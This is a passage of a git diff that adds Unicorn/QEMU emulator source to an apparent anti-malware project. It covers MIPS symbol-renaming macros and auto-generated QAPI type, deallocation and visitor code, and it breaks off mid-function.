+#define helper_cmpabs_d_ult helper_cmpabs_d_ult_mipsel +#define helper_cmp_d_ole helper_cmp_d_ole_mipsel +#define helper_cmpabs_d_ole helper_cmpabs_d_ole_mipsel +#define helper_cmp_d_ule helper_cmp_d_ule_mipsel +#define helper_cmpabs_d_ule helper_cmpabs_d_ule_mipsel +#define helper_cmp_d_sf helper_cmp_d_sf_mipsel +#define helper_cmpabs_d_sf helper_cmpabs_d_sf_mipsel +#define helper_cmp_d_ngle helper_cmp_d_ngle_mipsel +#define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mipsel +#define helper_cmp_d_seq helper_cmp_d_seq_mipsel +#define helper_cmpabs_d_seq helper_cmpabs_d_seq_mipsel +#define helper_cmp_d_ngl helper_cmp_d_ngl_mipsel +#define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mipsel +#define helper_cmp_d_lt helper_cmp_d_lt_mipsel +#define helper_cmpabs_d_lt helper_cmpabs_d_lt_mipsel +#define helper_cmp_d_nge helper_cmp_d_nge_mipsel +#define helper_cmpabs_d_nge helper_cmpabs_d_nge_mipsel +#define helper_cmp_d_le helper_cmp_d_le_mipsel +#define helper_cmpabs_d_le helper_cmpabs_d_le_mipsel +#define helper_cmp_d_ngt helper_cmp_d_ngt_mipsel +#define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mipsel +#define helper_cmp_s_f helper_cmp_s_f_mipsel +#define helper_cmpabs_s_f helper_cmpabs_s_f_mipsel +#define helper_cmp_s_un helper_cmp_s_un_mipsel +#define helper_cmpabs_s_un helper_cmpabs_s_un_mipsel +#define helper_cmp_s_eq helper_cmp_s_eq_mipsel +#define helper_cmpabs_s_eq helper_cmpabs_s_eq_mipsel +#define helper_cmp_s_ueq helper_cmp_s_ueq_mipsel +#define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mipsel +#define helper_cmp_s_olt helper_cmp_s_olt_mipsel +#define helper_cmpabs_s_olt helper_cmpabs_s_olt_mipsel +#define helper_cmp_s_ult helper_cmp_s_ult_mipsel +#define helper_cmpabs_s_ult helper_cmpabs_s_ult_mipsel +#define helper_cmp_s_ole helper_cmp_s_ole_mipsel +#define helper_cmpabs_s_ole helper_cmpabs_s_ole_mipsel +#define helper_cmp_s_ule helper_cmp_s_ule_mipsel +#define helper_cmpabs_s_ule helper_cmpabs_s_ule_mipsel +#define helper_cmp_s_sf helper_cmp_s_sf_mipsel +#define helper_cmpabs_s_sf helper_cmpabs_s_sf_mipsel +#define helper_cmp_s_ngle helper_cmp_s_ngle_mipsel +#define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mipsel +#define helper_cmp_s_seq helper_cmp_s_seq_mipsel +#define helper_cmpabs_s_seq helper_cmpabs_s_seq_mipsel +#define helper_cmp_s_ngl helper_cmp_s_ngl_mipsel +#define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mipsel +#define helper_cmp_s_lt helper_cmp_s_lt_mipsel +#define helper_cmpabs_s_lt helper_cmpabs_s_lt_mipsel +#define helper_cmp_s_nge helper_cmp_s_nge_mipsel +#define helper_cmpabs_s_nge helper_cmpabs_s_nge_mipsel +#define helper_cmp_s_le helper_cmp_s_le_mipsel +#define helper_cmpabs_s_le helper_cmpabs_s_le_mipsel +#define helper_cmp_s_ngt helper_cmp_s_ngt_mipsel +#define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mipsel +#define helper_cmp_ps_f helper_cmp_ps_f_mipsel +#define helper_cmpabs_ps_f helper_cmpabs_ps_f_mipsel +#define helper_cmp_ps_un helper_cmp_ps_un_mipsel +#define helper_cmpabs_ps_un helper_cmpabs_ps_un_mipsel +#define helper_cmp_ps_eq helper_cmp_ps_eq_mipsel +#define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mipsel +#define helper_cmp_ps_ueq helper_cmp_ps_ueq_mipsel +#define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mipsel +#define helper_cmp_ps_olt helper_cmp_ps_olt_mipsel +#define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mipsel +#define helper_cmp_ps_ult helper_cmp_ps_ult_mipsel +#define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mipsel +#define helper_cmp_ps_ole helper_cmp_ps_ole_mipsel +#define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mipsel +#define helper_cmp_ps_ule helper_cmp_ps_ule_mipsel +#define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mipsel +#define helper_cmp_ps_sf helper_cmp_ps_sf_mipsel +#define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mipsel +#define helper_cmp_ps_ngle helper_cmp_ps_ngle_mipsel +#define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mipsel +#define helper_cmp_ps_seq helper_cmp_ps_seq_mipsel +#define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mipsel +#define helper_cmp_ps_ngl helper_cmp_ps_ngl_mipsel +#define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mipsel +#define helper_cmp_ps_lt helper_cmp_ps_lt_mipsel +#define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mipsel +#define helper_cmp_ps_nge helper_cmp_ps_nge_mipsel +#define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mipsel +#define helper_cmp_ps_le helper_cmp_ps_le_mipsel +#define helper_cmpabs_ps_le helper_cmpabs_ps_le_mipsel +#define helper_cmp_ps_ngt helper_cmp_ps_ngt_mipsel +#define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mipsel +#define helper_r6_cmp_d_af helper_r6_cmp_d_af_mipsel +#define helper_r6_cmp_d_un helper_r6_cmp_d_un_mipsel +#define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mipsel +#define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mipsel +#define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mipsel +#define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mipsel +#define helper_r6_cmp_d_le helper_r6_cmp_d_le_mipsel +#define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mipsel +#define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mipsel +#define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mipsel +#define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mipsel +#define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mipsel +#define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mipsel +#define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mipsel +#define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mipsel +#define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mipsel +#define helper_r6_cmp_d_or helper_r6_cmp_d_or_mipsel +#define helper_r6_cmp_d_une helper_r6_cmp_d_une_mipsel +#define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mipsel +#define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mipsel +#define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mipsel +#define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mipsel +#define helper_r6_cmp_s_af helper_r6_cmp_s_af_mipsel +#define helper_r6_cmp_s_un helper_r6_cmp_s_un_mipsel +#define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mipsel +#define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mipsel +#define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mipsel +#define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mipsel +#define helper_r6_cmp_s_le helper_r6_cmp_s_le_mipsel +#define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mipsel +#define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mipsel +#define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mipsel +#define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mipsel +#define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mipsel +#define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mipsel +#define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mipsel +#define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mipsel +#define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mipsel +#define helper_r6_cmp_s_or helper_r6_cmp_s_or_mipsel +#define helper_r6_cmp_s_une helper_r6_cmp_s_une_mipsel +#define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mipsel +#define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mipsel +#define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mipsel +#define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mipsel +#define helper_msa_ld_df helper_msa_ld_df_mipsel +#define helper_msa_st_df helper_msa_st_df_mipsel +#define no_mmu_map_address no_mmu_map_address_mipsel +#define fixed_mmu_map_address fixed_mmu_map_address_mipsel +#define r4k_map_address r4k_map_address_mipsel +#define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mipsel +#define mips_cpu_handle_mmu_fault mips_cpu_handle_mmu_fault_mipsel +#define cpu_mips_translate_address cpu_mips_translate_address_mipsel +#define exception_resume_pc exception_resume_pc_mipsel +#define mips_cpu_do_interrupt mips_cpu_do_interrupt_mipsel +#define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mipsel +#define r4k_invalidate_tlb r4k_invalidate_tlb_mipsel +#define helper_absq_s_ob helper_absq_s_ob_mipsel +#define helper_absq_s_qh helper_absq_s_qh_mipsel +#define helper_absq_s_pw helper_absq_s_pw_mipsel +#define helper_adduh_ob helper_adduh_ob_mipsel +#define helper_adduh_r_ob helper_adduh_r_ob_mipsel +#define helper_subuh_ob helper_subuh_ob_mipsel +#define helper_subuh_r_ob helper_subuh_r_ob_mipsel +#define helper_addq_pw helper_addq_pw_mipsel +#define helper_addq_qh helper_addq_qh_mipsel +#define helper_addq_s_pw helper_addq_s_pw_mipsel +#define helper_addq_s_qh helper_addq_s_qh_mipsel +#define helper_addu_ob helper_addu_ob_mipsel +#define helper_addu_qh helper_addu_qh_mipsel +#define helper_addu_s_ob helper_addu_s_ob_mipsel +#define helper_addu_s_qh helper_addu_s_qh_mipsel +#define helper_subq_pw helper_subq_pw_mipsel +#define helper_subq_qh helper_subq_qh_mipsel +#define helper_subq_s_pw helper_subq_s_pw_mipsel +#define helper_subq_s_qh helper_subq_s_qh_mipsel +#define helper_subu_ob helper_subu_ob_mipsel +#define helper_subu_qh helper_subu_qh_mipsel +#define helper_subu_s_ob helper_subu_s_ob_mipsel +#define helper_subu_s_qh helper_subu_s_qh_mipsel +#define helper_raddu_l_ob helper_raddu_l_ob_mipsel +#define helper_precr_ob_qh helper_precr_ob_qh_mipsel +#define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mipsel +#define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mipsel +#define helper_precrq_ob_qh helper_precrq_ob_qh_mipsel +#define helper_precrq_qh_pw helper_precrq_qh_pw_mipsel +#define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mipsel +#define helper_precrq_pw_l helper_precrq_pw_l_mipsel +#define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mipsel +#define helper_preceq_pw_qhl helper_preceq_pw_qhl_mipsel +#define helper_preceq_pw_qhr helper_preceq_pw_qhr_mipsel +#define helper_preceq_pw_qhla helper_preceq_pw_qhla_mipsel +#define helper_preceq_pw_qhra helper_preceq_pw_qhra_mipsel +#define helper_precequ_qh_obl helper_precequ_qh_obl_mipsel +#define helper_precequ_qh_obr helper_precequ_qh_obr_mipsel +#define helper_precequ_qh_obla helper_precequ_qh_obla_mipsel +#define helper_precequ_qh_obra helper_precequ_qh_obra_mipsel +#define helper_preceu_qh_obl helper_preceu_qh_obl_mipsel +#define helper_preceu_qh_obr helper_preceu_qh_obr_mipsel +#define helper_preceu_qh_obla helper_preceu_qh_obla_mipsel +#define helper_preceu_qh_obra helper_preceu_qh_obra_mipsel +#define helper_shll_ob helper_shll_ob_mipsel +#define helper_shrl_ob helper_shrl_ob_mipsel +#define helper_shra_ob helper_shra_ob_mipsel +#define helper_shra_r_ob helper_shra_r_ob_mipsel +#define helper_shll_qh helper_shll_qh_mipsel +#define helper_shll_s_qh helper_shll_s_qh_mipsel +#define helper_shrl_qh helper_shrl_qh_mipsel +#define helper_shra_qh helper_shra_qh_mipsel +#define helper_shra_r_qh helper_shra_r_qh_mipsel +#define helper_shll_pw helper_shll_pw_mipsel +#define helper_shll_s_pw helper_shll_s_pw_mipsel +#define helper_shra_pw helper_shra_pw_mipsel +#define helper_shra_r_pw helper_shra_r_pw_mipsel +#define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mipsel +#define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mipsel +#define helper_mulq_rs_qh helper_mulq_rs_qh_mipsel +#define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mipsel +#define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mipsel +#define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mipsel +#define helper_dpau_h_obl helper_dpau_h_obl_mipsel +#define helper_dpau_h_obr helper_dpau_h_obr_mipsel +#define helper_dpsu_h_obl helper_dpsu_h_obl_mipsel +#define helper_dpsu_h_obr helper_dpsu_h_obr_mipsel +#define helper_dpa_w_qh helper_dpa_w_qh_mipsel +#define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mipsel +#define helper_dps_w_qh helper_dps_w_qh_mipsel +#define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mipsel +#define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mipsel +#define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mipsel +#define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mipsel +#define helper_maq_s_w_qhll helper_maq_s_w_qhll_mipsel +#define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mipsel +#define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mipsel +#define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mipsel +#define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mipsel +#define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mipsel +#define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mipsel +#define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mipsel +#define helper_maq_s_l_pwl helper_maq_s_l_pwl_mipsel +#define helper_maq_s_l_pwr helper_maq_s_l_pwr_mipsel +#define helper_dmadd helper_dmadd_mipsel +#define helper_dmaddu helper_dmaddu_mipsel +#define helper_dmsub helper_dmsub_mipsel +#define helper_dmsubu helper_dmsubu_mipsel +#define helper_dinsv helper_dinsv_mipsel +#define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mipsel +#define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mipsel +#define helper_cmpgu_le_ob helper_cmpgu_le_ob_mipsel +#define helper_cmpu_eq_ob helper_cmpu_eq_ob_mipsel +#define helper_cmpu_lt_ob helper_cmpu_lt_ob_mipsel +#define helper_cmpu_le_ob helper_cmpu_le_ob_mipsel +#define helper_cmp_eq_qh helper_cmp_eq_qh_mipsel +#define helper_cmp_lt_qh helper_cmp_lt_qh_mipsel +#define helper_cmp_le_qh helper_cmp_le_qh_mipsel +#define helper_cmp_eq_pw helper_cmp_eq_pw_mipsel +#define helper_cmp_lt_pw helper_cmp_lt_pw_mipsel +#define helper_cmp_le_pw helper_cmp_le_pw_mipsel +#define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mipsel +#define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mipsel +#define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mipsel +#define helper_pick_ob helper_pick_ob_mipsel +#define helper_pick_qh helper_pick_qh_mipsel +#define helper_pick_pw helper_pick_pw_mipsel +#define helper_packrl_pw helper_packrl_pw_mipsel +#define helper_dextr_w helper_dextr_w_mipsel +#define helper_dextr_r_w helper_dextr_r_w_mipsel +#define helper_dextr_rs_w helper_dextr_rs_w_mipsel +#define helper_dextr_l helper_dextr_l_mipsel +#define helper_dextr_r_l helper_dextr_r_l_mipsel +#define helper_dextr_rs_l helper_dextr_rs_l_mipsel +#define helper_dextr_s_h helper_dextr_s_h_mipsel +#define helper_dextp helper_dextp_mipsel +#define helper_dextpdp helper_dextpdp_mipsel +#define helper_dshilo helper_dshilo_mipsel +#define helper_dmthlip helper_dmthlip_mipsel +#define helper_dclo helper_dclo_mipsel +#define helper_dclz helper_dclz_mipsel +#define helper_dbitswap helper_dbitswap_mipsel +#define helper_lld helper_lld_mipsel +#define helper_scd helper_scd_mipsel +#define helper_sdl helper_sdl_mipsel +#define helper_sdr helper_sdr_mipsel +#define helper_ldm helper_ldm_mipsel +#define helper_sdm helper_sdm_mipsel +#define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mipsel +#define helper_dmfc0_tchalt helper_dmfc0_tchalt_mipsel +#define helper_dmfc0_tccontext helper_dmfc0_tccontext_mipsel +#define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mipsel +#define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mipsel +#define helper_dmfc0_lladdr helper_dmfc0_lladdr_mipsel +#define helper_dmfc0_watchlo helper_dmfc0_watchlo_mipsel +#define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mipsel +#define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mipsel +#define mips_reg_reset mips_reg_reset_mipsel +#define mips_reg_read mips_reg_read_mipsel +#define mips_reg_write mips_reg_write_mipsel +#define mips_tcg_init mips_tcg_init_mipsel +#define mips_cpu_list mips_cpu_list_mipsel +#define mips_release mips_release_mipsel +#define MIPS64_REGS_STORAGE_SIZE MIPS64_REGS_STORAGE_SIZE_mipsel +#define MIPS_REGS_STORAGE_SIZE MIPS_REGS_STORAGE_SIZE_mipsel +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.c new file mode 100644 index 0000000..173c654 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.c @@ -0,0 +1,293 @@ +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * deallocation functions for schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * Michael Roth + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/dealloc-visitor.h" +#include "qapi-types.h" +#include "qapi-visit.h" + +const char *ErrorClass_lookup[] = { + "GenericError", + "CommandNotFound", + "DeviceEncrypted", + "DeviceNotActive", + "DeviceNotFound", + "KVMMissingCap", + NULL, +}; + +const char *X86CPURegister32_lookup[] = { + "EAX", + "EBX", + "ECX", + "EDX", + "ESP", + "EBP", + "ESI", + "EDI", + NULL, +}; + + +#ifndef QAPI_TYPES_BUILTIN_CLEANUP_DEF_H +#define QAPI_TYPES_BUILTIN_CLEANUP_DEF_H + + +void qapi_free_strList(strList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_strList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_intList(intList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_intList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_numberList(numberList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_numberList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_boolList(boolList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_boolList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int8List(int8List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int8List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int16List(int16List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int16List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int32List(int32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int64List(int64List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int64List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint8List(uint8List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint8List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint16List(uint16List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint16List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint32List(uint32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint64List(uint64List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint64List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +#endif /* QAPI_TYPES_BUILTIN_CLEANUP_DEF_H */ + + +void qapi_free_ErrorClassList(ErrorClassList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_ErrorClassList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPURegister32List(X86CPURegister32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPURegister32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPUFeatureWordInfoList(X86CPUFeatureWordInfoList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPUFeatureWordInfoList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPUFeatureWordInfo(X86CPUFeatureWordInfo *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPUFeatureWordInfo(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.h b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.h new file mode 100644 index 0000000..944e882 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.h @@ -0,0 +1,228 @@ +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QAPI_TYPES_H +#define QAPI_TYPES_H + +#include "unicorn/platform.h" + + +#ifndef QAPI_TYPES_BUILTIN_STRUCT_DECL_H +#define QAPI_TYPES_BUILTIN_STRUCT_DECL_H + + +typedef struct strList +{ + union { + char *value; + uint64_t padding; + }; + struct strList *next; +} strList; + +typedef struct intList +{ + union { + int64_t value; + uint64_t padding; + }; + struct intList *next; +} intList; + +typedef struct numberList +{ + union { + double value; + uint64_t padding; + }; + struct numberList *next; +} numberList; + +typedef struct boolList +{ + union { + bool value; + uint64_t padding; + }; + struct boolList *next; +} boolList; + +typedef struct int8List +{ + union { + int8_t value; + uint64_t padding; + }; + struct int8List *next; +} int8List; + +typedef struct int16List +{ + union { + int16_t value; + uint64_t padding; + }; + struct int16List *next; +} int16List; + +typedef struct int32List +{ + union { + int32_t value; + uint64_t padding; + }; + struct int32List *next; +} int32List; + +typedef struct int64List +{ + union { + int64_t value; + uint64_t padding; + }; + struct int64List *next; +} int64List; + +typedef struct uint8List +{ + union { + uint8_t value; + uint64_t padding; + }; + struct uint8List *next; +} uint8List; + +typedef struct uint16List +{ + union { + uint16_t value; + uint64_t padding; + }; + struct uint16List *next; +} uint16List; + +typedef struct uint32List +{ + union { + uint32_t value; + uint64_t padding; + }; + struct uint32List *next; +} uint32List; + +typedef struct uint64List +{ + union { + uint64_t value; + uint64_t padding; + }; + struct uint64List *next; +} uint64List; + +#endif /* QAPI_TYPES_BUILTIN_STRUCT_DECL_H */ + + +extern const char *ErrorClass_lookup[]; +typedef enum ErrorClass +{ + ERROR_CLASS_GENERIC_ERROR = 0, + ERROR_CLASS_COMMAND_NOT_FOUND = 1, + ERROR_CLASS_DEVICE_ENCRYPTED = 2, + ERROR_CLASS_DEVICE_NOT_ACTIVE = 3, + ERROR_CLASS_DEVICE_NOT_FOUND = 4, + ERROR_CLASS_KVM_MISSING_CAP = 5, + ERROR_CLASS_MAX = 6, +} ErrorClass; + +typedef struct ErrorClassList +{ + union { + ErrorClass value; + uint64_t padding; + }; + struct ErrorClassList *next; +} ErrorClassList; + +extern const char *X86CPURegister32_lookup[]; +typedef enum X86CPURegister32 +{ + X86_CPU_REGISTER32_EAX = 0, + X86_CPU_REGISTER32_EBX = 1, + X86_CPU_REGISTER32_ECX = 2, + X86_CPU_REGISTER32_EDX = 3, + X86_CPU_REGISTER32_ESP = 4, + X86_CPU_REGISTER32_EBP = 5, + X86_CPU_REGISTER32_ESI = 6, + X86_CPU_REGISTER32_EDI = 7, + X86_CPU_REGISTER32_MAX = 8, +} X86CPURegister32; + +typedef struct X86CPURegister32List +{ + union { + X86CPURegister32 value; + uint64_t padding; + }; + struct X86CPURegister32List *next; +} X86CPURegister32List; + + +typedef struct X86CPUFeatureWordInfo X86CPUFeatureWordInfo; + +typedef struct X86CPUFeatureWordInfoList +{ + union { + X86CPUFeatureWordInfo *value; + uint64_t padding; + }; + struct X86CPUFeatureWordInfoList *next; +} X86CPUFeatureWordInfoList; + +#ifndef QAPI_TYPES_BUILTIN_CLEANUP_DECL_H +#define QAPI_TYPES_BUILTIN_CLEANUP_DECL_H + +void qapi_free_strList(strList *obj); +void qapi_free_intList(intList *obj); +void qapi_free_numberList(numberList *obj); +void qapi_free_boolList(boolList *obj); +void qapi_free_int8List(int8List *obj); +void qapi_free_int16List(int16List *obj); +void qapi_free_int32List(int32List *obj); +void qapi_free_int64List(int64List *obj); +void qapi_free_uint8List(uint8List *obj); +void qapi_free_uint16List(uint16List *obj); +void qapi_free_uint32List(uint32List *obj); +void qapi_free_uint64List(uint64List *obj); + +#endif /* QAPI_TYPES_BUILTIN_CLEANUP_DECL_H */ + + +void qapi_free_ErrorClassList(ErrorClassList *obj); + +void qapi_free_X86CPURegister32List(X86CPURegister32List *obj); + +struct X86CPUFeatureWordInfo +{ + int64_t cpuid_input_eax; + bool has_cpuid_input_ecx; + int64_t cpuid_input_ecx; + X86CPURegister32 cpuid_register; + int64_t features; +}; + +void qapi_free_X86CPUFeatureWordInfoList(X86CPUFeatureWordInfoList *obj); +void qapi_free_X86CPUFeatureWordInfo(X86CPUFeatureWordInfo *obj); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.c new file mode 100644 index 0000000..7733bb5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.c @@ -0,0 +1,428 @@ +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qemu-common.h" +#include "qapi-visit.h" + +void visit_type_strList(Visitor *m, strList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, 